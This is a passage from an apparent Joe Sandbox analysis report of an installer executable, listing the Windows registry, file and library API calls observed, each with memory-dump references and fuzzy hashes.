                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                                                  • Instruction ID: cd0db04dc70eb2db95c0507bc2818c98f3fa4352d1ad4fdf37015ca79918bc5c
                                                  • Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                                                  • Instruction Fuzzy Hash: 2FE046F0640209BFEB109FB0EE49F7F7AADEB00704F404561BD00F2190EA7498088A7C

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 707 4023d6-402407 call 402acb * 2 call 402b5b 714 402957-402966 707->714 715 40240d-402417 707->715 717 402427-40242a 715->717 718 402419-402426 call 402acb lstrlenA 715->718 720 40242c-40243d call 402aa9 717->720 721 40243e-402441 717->721 718->717 720->721 725 402452-402466 RegSetValueExA 721->725 726 402443-40244d call 402f9c 721->726 729 402468 725->729 730 40246b-402548 RegCloseKey 725->730 726->725 729->730 730->714 732 40271c-402723 730->732 732->714
                                                  APIs
                                                  • lstrlenA.KERNEL32(0040AC18,00000023,00000011,00000002), ref: 00402421
                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,0040AC18,00000000,00000011,00000002), ref: 0040245E
                                                  • RegCloseKey.ADVAPI32(?,?,?,0040AC18,00000000,00000011,00000002), ref: 00402542
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID:
                                                  • API String ID: 2655323295-0
                                                  • Opcode ID: 4f16d4bf7909d29b697dbe6c79f78a3acee279fd1b41d6286fcb43dda6c46c2e
                                                  • Instruction ID: 52a398de0ffa64e75c678b0ba9290c89a7bc7a6ef294ba5bc2d5d90b06733894
                                                  • Opcode Fuzzy Hash: 4f16d4bf7909d29b697dbe6c79f78a3acee279fd1b41d6286fcb43dda6c46c2e
                                                  • Instruction Fuzzy Hash: C8118171E00215BEEB10EFA59E49AAEBA74EB54318F20843BF504F71D1CAB94D419B68
                                                  APIs
                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402517
                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 0040252A
                                                  • RegCloseKey.ADVAPI32(?,?,?,0040AC18,00000000,00000011,00000002), ref: 00402542
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Enum$CloseValue
                                                  • String ID:
                                                  • API String ID: 397863658-0
                                                  • Opcode ID: b4c15210f41ecf953e26901ff4092447194416178c46922be39451fc39009806
                                                  • Instruction ID: d6682fe5282a570b067a4eb437d7391ea775acd6fa74fe75c745453303d77b76
                                                  • Opcode Fuzzy Hash: b4c15210f41ecf953e26901ff4092447194416178c46922be39451fc39009806
                                                  • Instruction Fuzzy Hash: FF01B1B1A00205BFEB119FA59E9CEBF7A7CDF40348F10003EF005A61C0DAB84A459729
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                                                  • Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
                                                  • Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                                                  • Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C
                                                  APIs
                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004023A2
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004023AB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteValue
                                                  • String ID:
                                                  • API String ID: 2831762973-0
                                                  • Opcode ID: 71a5badde170228f31c4e392b74b06972dc2c03f2a8b4bc03b842f5c057287c2
                                                  • Instruction ID: dc076c437d6f5be21cba980f304133fc6836ac47c1eada38d5944ea3460b530d
                                                  • Opcode Fuzzy Hash: 71a5badde170228f31c4e392b74b06972dc2c03f2a8b4bc03b842f5c057287c2
                                                  • Instruction Fuzzy Hash: CCF09C32B00511ABD711BBE49B8EABE76A49B40314F25043FE602B71C1DAFC4D02876D
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 004051A9
                                                    • Part of subcall function 0040408B: SendMessageA.USER32(000103E0,00000000,00000000,00000000), ref: 0040409D
                                                  • CoUninitialize.COMBASE(00000404,00000000), ref: 004051F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: InitializeMessageSendUninitialize
                                                  • String ID:
                                                  • API String ID: 2896919175-0
                                                  • Opcode ID: 4d5a35a9e69c381e3a71e49746e515aeb3c7a3ab989e8b49d3278fd537e00ed7
                                                  • Instruction ID: 9a4107cfbe68633d7303be5c07e0fe70bc3b4157787a3ac4c512c47dfa525867
                                                  • Opcode Fuzzy Hash: 4d5a35a9e69c381e3a71e49746e515aeb3c7a3ab989e8b49d3278fd537e00ed7
                                                  • Instruction Fuzzy Hash: 44F02472A006009BE75067509E00B1777B0DBA0314F89043EFF84B72E0CAB548068A6D
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E49
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E54
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: cbece904df2faaeee2fc33aabcdec069b389f67dc9c5a953a219d05669d97587
                                                  • Instruction ID: 301f435b7022e7a65e96077de8e5544ac5a8ca3f4637985cbe4ed7087a67720a
                                                  • Opcode Fuzzy Hash: cbece904df2faaeee2fc33aabcdec069b389f67dc9c5a953a219d05669d97587
                                                  • Instruction Fuzzy Hash: DAE01272B04212AFDB14EBE5EA499EEB7B4DF40329B10443FE411F11D1DA7849419F5D
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                                    • Part of subcall function 004062CA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                                                    • Part of subcall function 004062CA: wsprintfA.USER32 ref: 0040631A
                                                    • Part of subcall function 004062CA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
                                                  • Instruction ID: b6ec051a43833f1e75efb6c097fb1b7945085d0745a1c08503facd7b36b6f755
                                                  • Opcode Fuzzy Hash: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
                                                  • Instruction Fuzzy Hash: 88E08C32604210ABD2106A709E0493B63A9AF88710306483EFA46F2240DB389C3696AD
                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\3lH2EWD4wU.exe,80000000,00000003), ref: 00405B3D
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                  • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                                                  • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                  • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,?,0040572C,?,?,00000000,0040590F,?,?,?,?), ref: 00405B19
                                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405B2D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                                  • Instruction ID: a6801623bae5b64e590af13d118403295127a001a29879099f28d41f07625d68
                                                  • Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                                  • Instruction Fuzzy Hash: A4D0C972504121ABC2102728AE0889BBB65DB54271702CA36F8A9A26B1DB304C569A98
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,004031FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405610
                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040561E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                  • Instruction ID: e893664a09cf2e9e2c2936498d7e4fae4244a4ac8c06b28443c2d62416ddc455
                                                  • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                  • Instruction Fuzzy Hash: 1AC08C302109029BDA001B309E08B173A95AB90381F118839604AE40B0CE32C405CD2E
                                                  APIs
                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402335
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: 9fcb8b4b564c740448a4b0e2fc3fd6f1d230d5e928dfd18d81c924f1707ae997
                                                  • Instruction ID: fc3d639ee2ba9d49225374e904560d05d066977e3d8f4235cfc91afb5433c7ac
                                                  • Opcode Fuzzy Hash: 9fcb8b4b564c740448a4b0e2fc3fd6f1d230d5e928dfd18d81c924f1707ae997
                                                  • Instruction Fuzzy Hash: 2FE012317005146BD72076B10FCE96F10989BC4308B284D3AF502761C6DDBD4D4245B9
                                                  APIs
                                                  • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405E7D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                  • Instruction ID: 7acc68ffa7400c9eee32ba1e20ae5f36fa8f71d611e671e2c7f17c05e0102792
                                                  • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                  • Instruction Fuzzy Hash: F0E0E67201050DBFEF095F50DD0AD7B371DEB44744F00492EFA45D4090E6B5A9619A74
                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403177,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BF4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                  • Instruction ID: a276b01dc183147df0450da273931698a90403b1c9d2199bac4a8b1ac439e1da
                                                  • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                  • Instruction Fuzzy Hash: B9E0EC3221476AABEF509E559C04AEB7B6CFB05360F008436FD55E2150D631E9219BA8
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031C1,00000000,00000000,00402FEB,000000FF,00000004,00000000,00000000,00000000), ref: 00405BC5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                  • Instruction ID: b16ae19e339659dac821aa5fa8ec0f56b65f92cb21281493c05533f45e405579
                                                  • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                  • Instruction Fuzzy Hash: 14E0EC3221065ABBDF109F559C00AEB7B6CFB05361F118836F915E3150E631F8219BB4
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405EB4,?,?,?,?,00000002,: Completed), ref: 00405E4A
                                                  Memory Dump Source
